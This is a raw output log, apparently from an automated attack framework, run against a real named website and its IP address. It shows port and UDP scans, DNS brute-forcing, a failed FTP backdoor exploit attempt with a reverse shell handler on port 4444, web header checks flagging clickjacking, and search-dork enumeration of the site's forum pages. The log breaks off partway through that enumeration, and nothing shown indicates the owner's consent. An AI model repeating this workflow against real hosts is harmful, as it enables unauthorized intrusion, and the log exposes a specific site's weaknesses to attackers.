  730. 21/tcp open ftp
  731. 53/tcp open domain
  732. 80/tcp open http
  733. 110/tcp open pop3
  734. 143/tcp open imap
  735. 443/tcp open https
  736. 465/tcp open smtps
  737. 587/tcp open submission
  738. 993/tcp open imaps
  739. 995/tcp open pop3s
  740. 3306/tcp open mysql
  741. 8081/tcp open blackice-icecap
  742. #######################################################################################################################################
  743. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-28 07:13 EDT
  744. Nmap scan report for alfetn.com (23.94.17.37)
  745. Host is up (0.56s latency).
  746. rDNS record for 23.94.17.37: host.colocrossing.com
  747.  
  748. PORT STATE SERVICE
  749. 53/udp open domain
  750. 67/udp open|filtered dhcps
  751. 68/udp open|filtered dhcpc
  752. 69/udp open|filtered tftp
  753. 88/udp open|filtered kerberos-sec
  754. 123/udp open|filtered ntp
  755. 137/udp open|filtered netbios-ns
  756. 138/udp open|filtered netbios-dgm
  757. 139/udp open|filtered netbios-ssn
  758. 161/udp open|filtered snmp
  759. 162/udp open|filtered snmptrap
  760. 389/udp open|filtered ldap
  761. 520/udp open|filtered route
  762. 2049/udp open|filtered nfs
  763. #######################################################################################################################################
  764. + -- --=[Port 21 opened... running tests...
  765. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-28 07:13 EDT
  766. Nmap scan report for alfetn.com (23.94.17.37)
  767. Host is up (0.20s latency).
  768. rDNS record for 23.94.17.37: host.colocrossing.com
  769.  
  770. PORT STATE SERVICE VERSION
  771. 21/tcp filtered ftp
  772. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  773. Device type: firewall|general purpose
  774. Running: Linux 2.4.X|2.6.X, ISS embedded
  775. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  776. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  777.  
  778. TRACEROUTE (using proto 1/icmp)
  779. HOP RTT ADDRESS
  780. 1 ... 30
  781.  
  782. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  783. Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds
  784. RHOST => alfetn.com
  785. RHOSTS => alfetn.com
  786. [*] alfetn.com:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  787. 220-You are user number 1 of 50 allowed.
  788. 220-Local time is now 07:13. Server port: 21.
  789. 220-This is a private system - No anonymous login
  790. 220-IPv6 connections are also welcome on this server.
  791. 220 You will be disconnected after 15 minutes of inactivity.
  792. [*] alfetn.com:21 - USER: 331 User Etw:) OK. Password required
  793. [*] Exploit completed, but no session was created.
  794. [*] Started reverse TCP double handler on 10.211.1.1:4444
  795. [*] alfetn.com:21 - Sending Backdoor Command
  796. [*] Exploit completed, but no session was created.
  797. + -- --=[Port 22 closed... skipping.
  798. + -- --=[Port 23 closed... skipping.
  799. + -- --=[Port 25 closed... skipping.
  800. + -- --=[Port 53 opened... running tests...
  801. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-28 07:14 EDT
  802. Nmap scan report for alfetn.com (23.94.17.37)
  803. Host is up (0.034s latency).
  804. rDNS record for 23.94.17.37: host.colocrossing.com
  805.  
  806. PORT STATE SERVICE VERSION
  807. 53/tcp filtered domain
  808. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  809. Device type: firewall|general purpose
  810. Running: Linux 2.4.X|2.6.X, ISS embedded
  811. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  812. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  813.  
  814. Host script results:
  815. | dns-blacklist:
  816. | SPAM
  817. | all.spamrats.com - DYNAMIC
  818. |_ l2.apews.org - SPAM
  819. | dns-brute:
  820. | DNS Brute-force hostnames:
  821. | ns1.alfetn.com - 23.94.17.37
  822. | ns2.alfetn.com - 172.245.104.110
  823. | mail.alfetn.com - 23.94.17.37
  824. | www.alfetn.com - 23.94.17.37
  825. |_ ftp.alfetn.com - 23.94.17.37
  826.  
  827. TRACEROUTE (using proto 1/icmp)
  828. HOP RTT ADDRESS
  829. 1 ... 30
  830. #######################################################################################################################################
  831.  
  832. ^ ^
  833. _ __ _ ____ _ __ _ _ ____
  834. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  835. | V V // o // _/ | V V // 0 // 0 // _/
  836. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  837. <
  838. ...'
  839.  
  840. WAFW00F - Web Application Firewall Detection Tool
  841.  
  842. By Sandro Gauci && Wendel G. Henrique
  843.  
  844. Checking http://alfetn.com
  845. Generic Detection results:
  846. No WAF detected by the generic detection
  847. Number of requests: 13
  848.  
  849. http://alfetn.com [200 OK] Country[UNITED STATES][US], HTTPServer[nginx admin], IP[23.94.17.37], MetaGenerator[Microsoft FrontPage 5.0], Title[&THORN;&Ntilde;&iacute;&Egrave;&Ccedil;&eth; &atilde;&auml;&Ecirc;&Iuml;&iacute;&Ccedil;&Ecirc; &Ccedil;&aacute;&atilde;&aacute;&Ccedil;&Iacute;&atilde; &aelig; &Ccedil;&aacute;&Yacute;&Ecirc;&auml;], X-Cache[Backend]
  850.  
  851. __ ______ _____
  852. \ \/ / ___|_ _|
  853. \ /\___ \ | |
  854. / \ ___) || |
  855. /_/\_|____/ |_|
  856.  
  857. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  858. + -- --=[Target: alfetn.com:80
  859. + -- --=[Site not vulnerable to Cross-Site Tracing!
  860. + -- --=[Site not vulnerable to Host Header Injection!
  861. + -- --=[Site vulnerable to Cross-Frame Scripting!
  862. + -- --=[Site vulnerable to Clickjacking!
  863.  
  864. HTTP/1.1 405 Not Allowed
  865. Server: nginx admin
  866. Date: Thu, 28 Jun 2018 11:14:17 GMT
  867. Content-Type: text/html
  868. Content-Length: 166
  869. Connection: close
  870.  
  871. <html>
  872. <head><title>405 Not Allowed</title></head>
  873. <body bgcolor="white">
  874. <center><h1>405 Not Allowed</h1></center>
  875. <hr><center>nginx</center>
  876. </body>
  877. </html>
  878.  
  879. HTTP/1.1 200 OK
  880. Server: nginx admin
  881. Date: Thu, 28 Jun 2018 11:14:21 GMT
  882. Content-Type: text/html
  883. Content-Length: 38710
  884. Connection: keep-alive
  885. Vary: Accept-Encoding
  886. Last-Modified: Wed, 28 Sep 2011 17:56:17 GMT
  887. X-Cache: HIT from Backend
  888. Accept-Ranges: bytes
  889.  
  890.  
  891. <html dir="rtl" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" ">
  892.  
  893. <head>
  894. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  895. <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
  896. <meta name="ProgId" content="FrontPage.Editor.Document">
  897. <meta name="Microsoft Theme" content="none, default">
  898.  
  899. <title>&THORN;&Ntilde;&iacute;&Egrave;&Ccedil;&eth; &atilde;&auml;&Ecirc;&Iuml;&iacute;&Ccedil;&Ecirc; &Ccedil;&aacute;&atilde;&aacute;&Ccedil;&Iacute;&atilde; &aelig; &Ccedil;&aacute;&Yacute;&Ecirc;&auml;</title>
  900. </head>
  901.  
  902. <body bgcolor="#90B0D8">
  903.  
  904. <table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#008080" width="100%" id="AutoNumber6" bgcolor="
  905. #######################################################################################################################################
  906. + -- --=[Checking if X-Content options are enabled on alfetn.com...
  907.  
  908. + -- --=[Checking if X-Frame options are enabled on alfetn.com...
  909.  
  910. + -- --=[Checking if X-XSS-Protection header is enabled on alfetn.com...
  911.  
  912. + -- --=[Checking HTTP methods on alfetn.com...
  913. Allow: GET,HEAD,POST,OPTIONS
  914.  
  915. + -- --=[Checking if TRACE method is enabled on alfetn.com...
  916.  
  917. + -- --=[Checking for META tags on alfetn.com...
  918. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  919. <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
  920. <meta name="ProgId" content="FrontPage.Editor.Document">
  921. <meta name="Microsoft Theme" content="none, default">
  922.  
  923. + -- --=[Checking for open proxy on alfetn.com...
  924. <html><head><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
  925.  
  926. + -- --=[Enumerating software on alfetn.com...
  927. Server: nginx admin
  928.  
  929. + -- --=[Checking if Strict-Transport-Security is enabled on alfetn.com...
  930.  
  931. + -- --=[Checking for Flash cross-domain policy on alfetn.com...
  932.  
  933. + -- --=[Checking for Silverlight cross-domain policy on alfetn.com...
  934.  
  935. + -- --=[Checking for HTML5 cross-origin resource sharing on alfetn.com...
  936.  
  937. + -- --=[Retrieving robots.txt on alfetn.com...
  938.  
  939. + -- --=[Retrieving sitemap.xml on alfetn.com...
  940.  
  941. + -- --=[Checking cookie attributes on alfetn.com...
  942.  
  943. + -- --=[Checking for ASP.NET Detailed Errors on alfetn.com...
  944. #######################################################################################################################################
  945. ---------------------------------------------------------------------------------------------------------------------------------------
  946.  
  947. [ ! ] Starting SCANNER INURLBR 2.1 at [28-06-2018 07:16:12]
  948. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  949. It is the end user's responsibility to obey all applicable local, state and federal laws.
  950. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  951.  
  952. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-alfetn.com.txt ]
  953. [ INFO ][ DORK ]::[ site:alfetn.com ]
  954. [ INFO ][ SEARCHING ]:: {
  955. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.es ]
  956.  
  957. [ INFO ][ SEARCHING ]::
  958. -[:::]
  959. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  960.  
  961. [ INFO ][ SEARCHING ]::
  962. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  963. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.it.ao ID: 002901626849897788481:cpnctza84gq ]
  964.  
  965. [ INFO ][ SEARCHING ]::
  966. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  967.  
  968. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  969.  
  970.  
  971. _[ - ]::--------------------------------------------------------------------------------------------------------------
  972. |_[ + ] [ 0 / 100 ]-[07:16:35] [ - ]
  973. |_[ + ] Target:: [ http://alfetn.com/ ]
  974. |_[ + ] Exploit::
  975. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin , IP:23.94.17.37:80
  976. |_[ + ] More details:: / - / , ISP:
  977. |_[ + ] Found:: UNIDENTIFIED
  978.  
  979. _[ - ]::--------------------------------------------------------------------------------------------------------------
  980. |_[ + ] [ 1 / 100 ]-[07:16:40] [ - ]
  981. |_[ + ] Target:: [ http://alfetn.com/vb3/index.php ]
  982. |_[ + ] Exploit::
  983. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  984. |_[ + ] More details:: / - / , ISP:
  985. |_[ + ] Found:: UNIDENTIFIED
  986.  
  987. _[ - ]::--------------------------------------------------------------------------------------------------------------
  988. |_[ + ] [ 2 / 100 ]-[07:16:44] [ - ]
  989. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1066943 ]
  990. |_[ + ] Exploit::
  991. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  992. |_[ + ] More details:: / - / , ISP:
  993. |_[ + ] Found:: UNIDENTIFIED
  994.  
  995. _[ - ]::--------------------------------------------------------------------------------------------------------------
  996. |_[ + ] [ 3 / 100 ]-[07:16:49] [ - ]
  997. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1063817 ]
  998. |_[ + ] Exploit::
  999. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1000. |_[ + ] More details:: / - / , ISP:
  1001. |_[ + ] Found:: UNIDENTIFIED
  1002.  
  1003. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1004. |_[ + ] [ 4 / 100 ]-[07:16:54] [ - ]
  1005. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1058952 ]
  1006. |_[ + ] Exploit::
  1007. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1008. |_[ + ] More details:: / - / , ISP:
  1009. |_[ + ] Found:: UNIDENTIFIED
  1010.  
  1011. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1012. |_[ + ] [ 5 / 100 ]-[07:16:59] [ - ]
  1013. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1057773 ]
  1014. |_[ + ] Exploit::
  1015. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1016. |_[ + ] More details:: / - / , ISP:
  1017. |_[ + ] Found:: UNIDENTIFIED
  1018.  
  1019. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1020. |_[ + ] [ 6 / 100 ]-[07:17:04] [ - ]
  1021. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1049446 ]
  1022. |_[ + ] Exploit::
  1023. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1024. |_[ + ] More details:: / - / , ISP:
  1025. |_[ + ] Found:: UNIDENTIFIED
  1026.  
  1027. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1028. |_[ + ] [ 7 / 100 ]-[07:17:08] [ - ]
  1029. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1049418 ]
  1030. |_[ + ] Exploit::
  1031. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1032. |_[ + ] More details:: / - / , ISP:
  1033. |_[ + ] Found:: UNIDENTIFIED
  1034.  
  1035. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1036. |_[ + ] [ 8 / 100 ]-[07:17:13] [ - ]
  1037. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1044646 ]
  1038. |_[ + ] Exploit::
  1039. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1040. |_[ + ] More details:: / - / , ISP:
  1041. |_[ + ] Found:: UNIDENTIFIED
  1042.  
  1043. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1044. |_[ + ] [ 9 / 100 ]-[07:17:18] [ - ]
  1045. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1043369 ]
  1046. |_[ + ] Exploit::
  1047. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1048. |_[ + ] More details:: / - / , ISP:
  1049. |_[ + ] Found:: UNIDENTIFIED
  1050.  
  1051. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1052. |_[ + ] [ 10 / 100 ]-[07:17:22] [ - ]
  1053. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1038472 ]
  1054. |_[ + ] Exploit::
  1055. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1056. |_[ + ] More details:: / - / , ISP:
  1057. |_[ + ] Found:: UNIDENTIFIED
  1058.  
  1059. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1060. |_[ + ] [ 11 / 100 ]-[07:17:28] [ - ]
  1061. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1027735 ]
  1062. |_[ + ] Exploit::
  1063. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1064. |_[ + ] More details:: / - / , ISP:
  1065. |_[ + ] Found:: UNIDENTIFIED
  1066.  
  1067. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1068. |_[ + ] [ 12 / 100 ]-[07:17:32] [ - ]
  1069. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1027165 ]
  1070. |_[ + ] Exploit::
  1071. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1072. |_[ + ] More details:: / - / , ISP:
  1073. |_[ + ] Found:: UNIDENTIFIED
  1074.  
  1075. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1076. |_[ + ] [ 13 / 100 ]-[07:17:36] [ - ]
  1077. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1019239 ]
  1078. |_[ + ] Exploit::
  1079. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1080. |_[ + ] More details:: / - / , ISP:
  1081. |_[ + ] Found:: UNIDENTIFIED
  1082.  
  1083. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1084. |_[ + ] [ 14 / 100 ]-[07:17:42] [ - ]
  1085. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=1028058 ]
  1086. |_[ + ] Exploit::
  1087. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1088. |_[ + ] More details:: / - / , ISP:
  1089. |_[ + ] Found:: UNIDENTIFIED
  1090.  
  1091. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1092. |_[ + ] [ 15 / 100 ]-[07:17:46] [ - ]
  1093. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1016231 ]
  1094. |_[ + ] Exploit::
  1095. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1096. |_[ + ] More details:: / - / , ISP:
  1097. |_[ + ] Found:: UNIDENTIFIED
  1098.  
  1099. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1100. |_[ + ] [ 16 / 100 ]-[07:17:52] [ - ]
  1101. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=972034 ]
  1102. |_[ + ] Exploit::
  1103. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1104. |_[ + ] More details:: / - / , ISP:
  1105. |_[ + ] Found:: UNIDENTIFIED
  1106.  
  1107. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1108. |_[ + ] [ 17 / 100 ]-[07:17:56] [ - ]
  1109. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=856081 ]
  1110. |_[ + ] Exploit::
  1111. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1112. |_[ + ] More details:: / - / , ISP:
  1113. |_[ + ] Found:: UNIDENTIFIED
  1114.  
  1115. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1116. |_[ + ] [ 18 / 100 ]-[07:18:02] [ - ]
  1117. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=973222 ]
  1118. |_[ + ] Exploit::
  1119. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1120. |_[ + ] More details:: / - / , ISP:
  1121. |_[ + ] Found:: UNIDENTIFIED
  1122.  
  1123. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1124. |_[ + ] [ 19 / 100 ]-[07:18:06] [ - ]
  1125. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=970032 ]
  1126. |_[ + ] Exploit::
  1127. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1128. |_[ + ] More details:: / - / , ISP:
  1129. |_[ + ] Found:: UNIDENTIFIED
  1130.  
  1131. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1132. |_[ + ] [ 20 / 100 ]-[07:18:10] [ - ]
  1133. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=958789 ]
  1134. |_[ + ] Exploit::
  1135. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1136. |_[ + ] More details:: / - / , ISP:
  1137. |_[ + ] Found:: UNIDENTIFIED
  1138.  
  1139. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1140. |_[ + ] [ 21 / 100 ]-[07:18:14] [ - ]
  1141. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=954145 ]
  1142. |_[ + ] Exploit::
  1143. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1144. |_[ + ] More details:: / - / , ISP:
  1145. |_[ + ] Found:: UNIDENTIFIED
  1146.  
  1147. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1148. |_[ + ] [ 22 / 100 ]-[07:18:19] [ - ]
  1149. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=950641 ]
  1150. |_[ + ] Exploit::
  1151. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1152. |_[ + ] More details:: / - / , ISP:
  1153. |_[ + ] Found:: UNIDENTIFIED
  1154.  
  1155. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1156. |_[ + ] [ 23 / 100 ]-[07:18:24] [ - ]
  1157. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=962497 ]
  1158. |_[ + ] Exploit::
  1159. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1160. |_[ + ] More details:: / - / , ISP:
  1161. |_[ + ] Found:: UNIDENTIFIED
  1162.  
  1163. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1164. |_[ + ] [ 24 / 100 ]-[07:18:28] [ - ]
  1165. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=833110 ]
  1166. |_[ + ] Exploit::
  1167. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1168. |_[ + ] More details:: / - / , ISP:
  1169. |_[ + ] Found:: UNIDENTIFIED
  1170.  
  1171. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1172. |_[ + ] [ 25 / 100 ]-[07:18:33] [ - ]
  1173. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=833753 ]
  1174. |_[ + ] Exploit::
  1175. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1176. |_[ + ] More details:: / - / , ISP:
  1177. |_[ + ] Found:: UNIDENTIFIED
  1178.  
  1179. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1180. |_[ + ] [ 26 / 100 ]-[07:18:39] [ - ]
  1181. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=793760 ]
  1182. |_[ + ] Exploit::
  1183. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1184. |_[ + ] More details:: / - / , ISP:
  1185. |_[ + ] Found:: UNIDENTIFIED
  1186.  
  1187. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1188. |_[ + ] [ 27 / 100 ]-[07:18:43] [ - ]
  1189. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=1042799 ]
  1190. |_[ + ] Exploit::
  1191. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1192. |_[ + ] More details:: / - / , ISP:
  1193. |_[ + ] Found:: UNIDENTIFIED
  1194.  
  1195. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1196. |_[ + ] [ 28 / 100 ]-[07:18:48] [ - ]
  1197. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=774058 ]
  1198. |_[ + ] Exploit::
  1199. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1200. |_[ + ] More details:: / - / , ISP:
  1201. |_[ + ] Found:: UNIDENTIFIED
  1202.  
  1203. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1204. |_[ + ] [ 29 / 100 ]-[07:18:53] [ - ]
  1205. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=739673 ]
  1206. |_[ + ] Exploit::
  1207. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1208. |_[ + ] More details:: / - / , ISP:
  1209. |_[ + ] Found:: UNIDENTIFIED
  1210.  
  1211. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1212. |_[ + ] [ 30 / 100 ]-[07:18:58] [ - ]
  1213. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=736442 ]
  1214. |_[ + ] Exploit::
  1215. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1216. |_[ + ] More details:: / - / , ISP:
  1217. |_[ + ] Found:: UNIDENTIFIED
  1218.  
  1219. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1220. |_[ + ] [ 31 / 100 ]-[07:19:03] [ - ]
  1221. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=687369 ]
  1222. |_[ + ] Exploit::
  1223. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1224. |_[ + ] More details:: / - / , ISP:
  1225. |_[ + ] Found:: UNIDENTIFIED
  1226.  
  1227. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1228. |_[ + ] [ 32 / 100 ]-[07:19:09] [ - ]
  1229. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=686597 ]
  1230. |_[ + ] Exploit::
  1231. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1232. |_[ + ] More details:: / - / , ISP:
  1233. |_[ + ] Found:: UNIDENTIFIED
  1234.  
  1235. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1236. |_[ + ] [ 33 / 100 ]-[07:19:14] [ - ]
  1237. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=668799 ]
  1238. |_[ + ] Exploit::
  1239. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1240. |_[ + ] More details:: / - / , ISP:
  1241. |_[ + ] Found:: UNIDENTIFIED
  1242.  
  1243. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1244. |_[ + ] [ 34 / 100 ]-[07:19:18] [ - ]
  1245. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=521780 ]
  1246. |_[ + ] Exploit::
  1247. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1248. |_[ + ] More details:: / - / , ISP:
  1249. |_[ + ] Found:: UNIDENTIFIED
  1250.  
  1251. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1252. |_[ + ] [ 35 / 100 ]-[07:19:24] [ - ]
  1253. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=649860 ]
  1254. |_[ + ] Exploit::
  1255. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1256. |_[ + ] More details:: / - / , ISP:
  1257. |_[ + ] Found:: UNIDENTIFIED
  1258.  
  1259. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1260. |_[ + ] [ 36 / 100 ]-[07:19:29] [ - ]
  1261. |_[ + ] Target:: [ http://www.alfetn.com/vb3/showthread.php?p=556322 ]
  1262. |_[ + ] Exploit::
  1263. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1264. |_[ + ] More details:: / - / , ISP:
  1265. |_[ + ] Found:: UNIDENTIFIED
  1266.  
  1267. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1268. |_[ + ] [ 37 / 100 ]-[07:19:33] [ - ]
  1269. |_[ + ] Target:: [ http://alfetn.com/vb3/showthread.php?p=629716 ]
  1270. |_[ + ] Exploit::
  1271. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx admin X-Powered-By: PHP/5.3.29, IP:23.94.17.37:80
  1272. |_[ + ] More details:: / - / , ISP:
  1273. |_[ + ] Found:: UNIDENTIFIED
  1274.  
  1275. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1276. |_[ + ] [ 38 / 100 ]-[07:19:38] [ - ]
